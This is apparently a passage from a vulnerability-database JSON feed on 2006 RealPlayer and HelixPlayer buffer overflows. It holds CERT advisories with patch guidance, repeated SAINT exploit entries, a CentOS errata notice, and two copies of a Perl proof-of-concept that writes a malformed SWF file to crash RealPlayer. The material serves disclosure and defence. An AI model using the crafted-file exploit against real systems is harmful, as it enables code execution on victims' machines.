vulnerable system.\n\n### Description\n\n**RealNetworks RealPlayer**\n\nRealNetworks [RealPlayer](<http://www.real.com/>) is a multimedia application that allows users to view local and remote audio/video content. \n \n**MBC Files** \n \nMBC files are used to for Mimio BoardCast audio sessions. More information on Mimio Boards is available on the Mimio [website.](<http://www.mimio.com/>) \n \n**The Problem** \n \nNumerous RealNetworks products fail to properly validate MBC files allowing a buffer overflow to occur. By persuading a user to access a specially crafted MBC file with RealPlayer, a remote attacker may be able to execute arbitrary code. \n \n**Considerations** \n \nA complete list of affected software is available in the [RealNetwork Security Update](<http://service.real.com/realplayer/security/03162006_player/en/>) for March 2006. \n \n--- \n \n### Impact\n\nBy convincing a user to open a specially crafted MBC file with RealPlayer, a remote, unauthenticated attacker can execute arbitrary code on a vulnerable system. \n \n--- \n \n### Solution\n\n**Patch RealPlayer** \nApply the patches supplied in the [RealNetwork Security Update](<http://service.real.com/realplayer/security/03162006_player/en/>) for March 2006. \n \n--- \n \n \n**Disable RealPlayer in your web browser** \n \nAn attacker may be able to exploit this vulnerability by embedding the crafted MBC file in a web page and convincing a user to access that page. Disabling RealPlayer in the web browser will eliminate this attack vector thereby reducing the chances of exploitation. \n \nTo disable RealPlayer in Microsoft Internet Explorer,disable the RealPlayer ActiveX control. In other web browsers, such as Mozilla Firefox, disable the RealPlayer plugin. \n \n--- \n \n### Vendor Information\n\n451556\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### RealNetworks, Inc. __ Affected\n\nUpdated: March 31, 2006 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nSee <http://service.real.com/realplayer/security/03162006_player/en/>.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23451556 Feedback>).\n\n \n\n\n### CVSS Metrics\n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References\n\n * <http://service.real.com/realplayer/security/03162006_player/en/>\n * <http://www.mimio.com/>\n * <http://secunia.com/advisories/19358/>\n * <http://secunia.com/advisories/19362/>\n * <http://secunia.com/advisories/19365/>\n * <http://secunia.com/advisories/19390/>\n\n### Acknowledgements\n\nThis issue was reported in RealNetwork Security Update for March 2006. RealNetworks credits John Heasman of NGSSoftware, Greg MacManus of iDEFENSE Labs, and Sowhat of Nevis Labs with providing information about this vulnerability.\n\nThis document was written by Jeff Gennari.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2006-1370](<http://web.nvd.nist.gov/vuln/detail/CVE-2006-1370>) \n---|--- \n**Severity Metric:** | 8.52 \n**Date Public:** | 2006-03-22 \n**Date First Published:** | 2006-04-01 \n**Date Last Updated: ** | 2006-04-24 11:07 UTC \n**Document Revision: ** | 19 \n", "cvss3": {}, "published": "2006-04-01T00:00:00", "type": "cert", "title": "RealNetworks products vulnerable to buffer overflow via specially crafted MBC file", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-1370"], "modified": "2006-04-24T11:07:00", "id": "VU:451556", "href": "https://www.kb.cert.org/vuls/id/451556", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-31T14:42:23", "description": "### Overview\n\nNumerous RealNetworks products do not properly handle chunked data. This vulnerability may allow a remote attacker to execute arbitrary code on a vulnerable system.\n\n### Description\n\n**RealNetworks RealPlayer**\n\nRealNetworks [RealPlayer](<http://www.real.com/>) is a multimedia application that allows users to view local and remote audio/video content. \n \n**Chunked Encoding** \n \nChunked encoding is a means to transfer variable-sized units of data (called chunks) from a web client to a web server. \n \n**The Problem** \n \nNumerous RealNetworks products fail to properly handle file chunks allowing a buffer overflow to occur. By persuading a user to access a RealPlayer file hosted on a malicious server, a remote attacker may be able to execute arbitrary code. \n \n**Considerations** \n \nA complete list of affected software is available in the [RealNetwork Security Update](<http://service.real.com/realplayer/security/03162006_player/en/>) for March 2006. \n \n--- \n \n### Impact\n\nBy convincing a user to open RealPlayer file hosted on a malicious server, a remote unauthenticated attacker can execute arbitrary code. \n \n--- \n \n### Solution\n\n**Patch RealPlayer**\n\nApply the patches supplied in the [RealNetwork Security Update](<http://service.real.com/realplayer/security/03162006_player/en/>) for March 2006. \n \n--- \n \n**Disable RealPlayer in your web browser**\n\n \nAn attacker may be able to exploit this vulnerability by persuading a user to access a RealPlayer file with a web browser. Disabling RealPlayer in the web browser will eliminate this attack vector thereby reducing the chances of exploitation. \n \nTo disable RealPlayer in Microsoft Internet Explorer, disable the RealPlayer ActiveX control. In other web browsers, such as Mozilla Firefox, disable the RealPlayer plugin. \n \n--- \n \n### Vendor Information\n\n172489\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### RealNetworks, Inc. __ Affected\n\nUpdated: April 05, 2006 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nSee <http://service.real.com/realplayer/security/03162006_player/en/>. \n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23172489 Feedback>).\n\n### Red Hat, Inc. __ Affected\n\nUpdated: May 17, 2006 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThis issue affected HelixPlayer in Red Hat Enterprise Linux 4, and RealPlayer in Red Hat Enterprise Linux Extras 3 and 4. Updated packages are available along with our advisories at the URL below and by using the Red Hat Network 'up2date' tool.\n\n<https://rhn.redhat.com/cve/CVE-2005-2922.html>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n \n\n\n### CVSS Metrics\n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References\n\n * <http://www.idefense.com/intelligence/vulnerabilities/display.php?id=404>\n * <http://securitytracker.com/id?1015808>\n * <http://www.service.real.com/realplayer/security/03162006_player/en/>\n * <http://secunia.com/advisories/19358/>\n * <http://secunia.com/advisories/19365/>\n\n### Acknowledgements\n\nThis vulnerability was reported by iDEFENSE Labs.\n\nThis document was written by Jeff Gennari.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2005-2922](<http://web.nvd.nist.gov/vuln/detail/CVE-2005-2922>) \n---|--- \n**Severity Metric:** | 20.20 \n**Date Public:** | 2006-03-23 \n**Date First Published:** | 2006-04-05 \n**Date Last Updated: ** | 2006-05-17 12:45 UTC \n**Document Revision: ** | 33 \n", "cvss3": {}, "published": "2006-04-05T00:00:00", "type": "cert", "title": "RealNetworks products fail to properly handle chunked data", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-2922"], "modified": "2006-05-17T12:45:00", "id": "VU:172489", "href": "https://www.kb.cert.org/vuls/id/172489", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:15:18", "description": "", "cvss3": {}, "published": "2006-04-01T00:00:00", "type": "packetstorm", "title": "realplayer-swf-PoC.pl.txt", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2006-0323"], "modified": "2006-04-01T00:00:00", "id": "PACKETSTORM:45093", "href": "https://packetstormsecurity.com/files/45093/realplayer-swf-PoC.pl.txt.html", "sourceData": "`#!/usr/bin/perl \n################################################### \n# RealPlayer: Buffer overflow vulnerability / PoC \n# \n# CVE-2006-0323 \n# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0323 \n# \n# RealNetworks Advisory \n# http://service.real.com/realplayer/security/03162006_player/en/ \n# \n# Federico L. Bossi Bonin \n# fbossi[at]netcomm.com.ar \n################################################### \n \n# Program received signal SIGSEGV, Segmentation fault. \n# [Switching to Thread -1218976064 (LWP 21932)] \n# 0xb502eeaf in CanUnload2 () from ./plugins/swfformat.so \n \nmy $EGGFILE=\"egg.swf\"; \nmy $header=\"\\x46\\x57\\x53\\x05\\xCF\\x00\\x00\\x00\\x60\"; \n \nmy $endheader=\"\\x19\\xe4\\x7d\\x1c\\xaf\\xa3\\x92\\x0c\\x72\\xc1\\x80\\x00\\xa2\\x08\\x01\". \n\"\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x01\\x00\\x00\\x00\\x02\\x03\\x00\\x02\". \n\"\\x00\\x00\\x00\\x04\\x04\\x00\\x03\\x00\\x00\\x00\\x08\\x05\\x00\\x04\\x00\". \n\"\\x00\\x00\\x00\\x89\\x06\\x06\\x01\\x00\\x01\\x00\\x16\\xfa\\x1f\\x40\\x40\". \n\"\\x00\\x00\\x00\"; \n \n \nopen(EGG, \">$EGGFILE\") or die \"ERROR:$EGGFILE\\n\"; \nprint EGG $header; \n \nfor ($i = 0; $i < 135; $i++) { \n$buffer.= \"\\x90\"; \n} \n \nprint EGG $buffer; \nprint EGG $endheader; \nclose(EGG); \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/45093/realplayer-swf-PoC.pl.txt"}], "saint": [{"lastseen": "2023-07-26T12:42:30", "description": "Added: 03/31/2006 \nCVE: [CVE-2005-2922](<https://vulners.com/cve/CVE-2005-2922>) \nBID: [17202](<http://www.securityfocus.com/bid/17202>) \nOSVDB: [24062](<http://www.osvdb.org/24062>) \n\n\n### Background\n\nRealPlayer, RealOne Player, and Helix Player include an embedded player which plays media embedded in a web page. \n\n### Problem\n\nA chunked HTTP response containing an invalid or missing chunk header results in a heap overflow, leading to command execution. \n\n### Resolution\n\nUse the _Check for Update_ feature to upgrade to the latest version of RealPlayer, RealOne Player, or Helix Player. \n\n### References\n\n<http://www.idefense.com/intelligence/vulnerabilities/display.php?id=404> \n\n\n### Limitations\n\nExploit works on RealPlayer 10.5 (6.0.12.1348). In order for the exploit to run, a user must load the exploit page in Internet Explorer. \n\n### Platforms\n\nWindows 2000 \nWindows XP \n \n\n", "cvss3": {}, "published": "2006-03-31T00:00:00", "type": "saint", "title": "RealPlayer invalid chunk header heap overflow", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-2922"], "modified": "2006-03-31T00:00:00", "id": "SAINT:32AF98CF80A27AB194B608D45186A636", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/realplayer_chunk_header", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:33:28", "description": "Added: 03/31/2006 \nCVE: [CVE-2005-2922](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2922>) \nBID: [17202](<http://www.securityfocus.com/bid/17202>) \nOSVDB: [24062](<http://www.osvdb.org/24062>) \n\n\n### Background\n\nRealPlayer, RealOne Player, and Helix Player include an embedded player which plays media embedded in a web page. \n\n### Problem\n\nA chunked HTTP response containing an invalid or missing chunk header results in a heap overflow, leading to command execution. \n\n### Resolution\n\nUse the _Check for Update_ feature to upgrade to the latest version of RealPlayer, RealOne Player, or Helix Player. \n\n### References\n\n<http://www.idefense.com/intelligence/vulnerabilities/display.php?id=404> \n\n\n### Limitations\n\nExploit works on RealPlayer 10.5 (6.0.12.1348). In order for the exploit to run, a user must load the exploit page in Internet Explorer. \n\n### Platforms\n\nWindows 2000 \nWindows XP \n \n\n", "cvss3": {}, "published": "2006-03-31T00:00:00", "type": "saint", "title": "RealPlayer invalid chunk header heap overflow", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-2922"], "modified": "2006-03-31T00:00:00", "id": "SAINT:74F1BEDE6E32D2B82819435F2160B116", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/realplayer_chunk_header", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:59", "description": "Added: 03/31/2006 \nCVE: [CVE-2005-2922](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2922>) \nBID: [17202](<http://www.securityfocus.com/bid/17202>) \nOSVDB: [24062](<http://www.osvdb.org/24062>) \n\n\n### Background\n\nRealPlayer, RealOne Player, and Helix Player include an embedded player which plays media embedded in a web page. \n\n### Problem\n\nA chunked HTTP response containing an invalid or missing chunk header results in a heap overflow, leading to command execution. \n\n### Resolution\n\nUse the _Check for Update_ feature to upgrade to the latest version of RealPlayer, RealOne Player, or Helix Player. \n\n### References\n\n<http://www.idefense.com/intelligence/vulnerabilities/display.php?id=404> \n\n\n### Limitations\n\nExploit works on RealPlayer 10.5 (6.0.12.1348). In order for the exploit to run, a user must load the exploit page in Internet Explorer. \n\n### Platforms\n\nWindows 2000 \nWindows XP \n \n\n", "cvss3": {}, "published": "2006-03-31T00:00:00", "type": "saint", "title": "RealPlayer invalid chunk header heap overflow", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2005-2922"], "modified": "2006-03-31T00:00:00", "id": "SAINT:CB07D6C943AA2B34E7B85CB005E75063", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/realplayer_chunk_header", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2023-09-21T13:54:40", "description": "Added: 03/31/2006 \nCVE: [CVE-2005-2922](<https://vulners.com/cve/CVE-2005-2922>) \nBID: [17202](<http://www.securityfocus.com/bid/17202>) \nOSVDB: [24062](<http://www.osvdb.org/24062>) \n\n\n### Background\n\nRealPlayer, RealOne Player, and Helix Player include an embedded player which plays media embedded in a web page. \n\n### Problem\n\nA chunked HTTP response containing an invalid or missing chunk header results in a heap overflow, leading to command execution. \n\n### Resolution\n\nUse the _Check for Update_ feature to upgrade to the latest version of RealPlayer, RealOne Player, or Helix Player. \n\n### References\n\n<http://www.idefense.com/intelligence/vulnerabilities/display.php?id=404> \n\n\n### Limitations\n\nExploit works on RealPlayer 10.5 (6.0.12.1348). In order for the exploit to run, a user must load the exploit page in Internet Explorer. \n\n### Platforms\n\nWindows 2000 \nWindows XP \n \n\n", "cvss3": {}, "published": "2006-03-31T00:00:00", "type": "saint", "title": "RealPlayer invalid chunk header heap overflow", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-2922"], "modified": "2006-03-31T00:00:00", "id": "SAINT:7A58BDE9BDCCED73750F291E450DEC53", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/realplayer_chunk_header", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2023-06-07T16:04:42", "description": "", "cvss3": {}, "published": "2006-03-23T00:00:00", "type": "exploitdb", "title": "RealNetworks (Multiple Products) - Multiple Buffer Overflow Vulnerabilities", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["2006-0323", "CVE-2006-0323"], "modified": "2006-03-23T00:00:00", "id": "EDB-ID:27460", "href": "https://www.exploit-db.com/exploits/27460", "sourceData": "source: https://www.securityfocus.com/bid/17202/info\n\nVarious RealNetworks products are prone to multiple buffer-overflow vulnerabilities.\n\nThese issues can result in memory corruption and facilitate arbitrary code execution. A successful attack can allow remote attackers to execute arbitrary code in the context of the application to gain unauthorized access.\n\n#!/usr/bin/perl\n###################################################\n# RealPlayer: Buffer overflow vulnerability / PoC\n#\n# CVE-2006-0323\n# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0323\n#\n# RealNetworks Advisory\n# http://service.real.com/realplayer/security/03162006_player/en/\n#\n# Federico L. Bossi Bonin\n# fbossi[at]netcomm.com.ar\n###################################################\n\n# Program received signal SIGSEGV, Segmentation fault.\n# [Switching to Thread -1218976064 (LWP 21932)]\n# 0xb502eeaf in CanUnload2 () from ./plugins/swfformat.so\n\nmy $EGGFILE=\"egg.swf\";\nmy $header=\"\\x46\\x57\\x53\\x05\\xCF\\x00\\x00\\x00\\x60\";\n\nmy $endheader=\"\\x19\\xe4\\x7d\\x1c\\xaf\\xa3\\x92\\x0c\\x72\\xc1\\x80\\x00\\xa2\\x08\\x01\".\n\t \"\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x01\\x00\\x00\\x00\\x02\\x03\\x00\\x02\".\n\t \"\\x00\\x00\\x00\\x04\\x04\\x00\\x03\\x00\\x00\\x00\\x08\\x05\\x00\\x04\\x00\".\n \"\\x00\\x00\\x00\\x89\\x06\\x06\\x01\\x00\\x01\\x00\\x16\\xfa\\x1f\\x40\\x40\".\n\t \"\\x00\\x00\\x00\";\n\n\nopen(EGG, \">$EGGFILE\") or die \"ERROR:$EGGFILE\\n\";\nprint EGG $header;\n\nfor ($i = 0; $i < 135; $i++) {\n$buffer.= \"\\x90\";\n}\n\nprint EGG $buffer;\nprint EGG $endheader;\nclose(EGG);", "sourceHref": "https://gitlab.com/exploit-database/exploitdb/-/raw/main/exploits/multiple/dos/27460.pl", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2023-08-23T18:54:21", "description": "**CentOS Errata and Security Advisory** CESA-2005:788\n\n\nHelixPlayer is a media player.\r\n\r\nA format string bug was discovered in the way HelixPlayer processes RealPix\r\n(.rp) files. It is possible for a malformed RealPix file to execute\r\narbitrary code as the user running HelixPlayer. The Common Vulnerabilities\r\nand Exposures project (cve.mitre.org) has assigned the name CAN-2005-2710\r\nto this issue.\r\n\r\nAll users of HelixPlayer are advised to upgrade to this updated package,\r\nwhich contains HelixPlayer version 10.0.6 and is not vulnerable to this issue.\n\n**Merged security bulletin from advisories:**\nhttps://lists.centos.org/pipermail/centos-announce/2005-September/061682.html\nhttps://lists.centos.org/pipermail/centos-announce/2005-September/061683.html\n\n**Affected packages:**\nHelixPlayer\n\n**Upstream details at:**\nhttps://access.redhat.com/errata/RHSA-2005:788", "cvss3": {}, "published": "2005-09-27T22:04:42", "type": "centos", "title": "HelixPlayer security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-2629", "CVE-2005-2710", "CVE-2005-2922"], "modified": "2005-09-27T22:05:18", "id": "CESA-2005:788", "href": "https://lists.centos.org/pipermail/centos-announce/2005-September/061682.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}
RealPlayer for Windows < Build 6.0.12.1483 Multiple Vulnerabilities
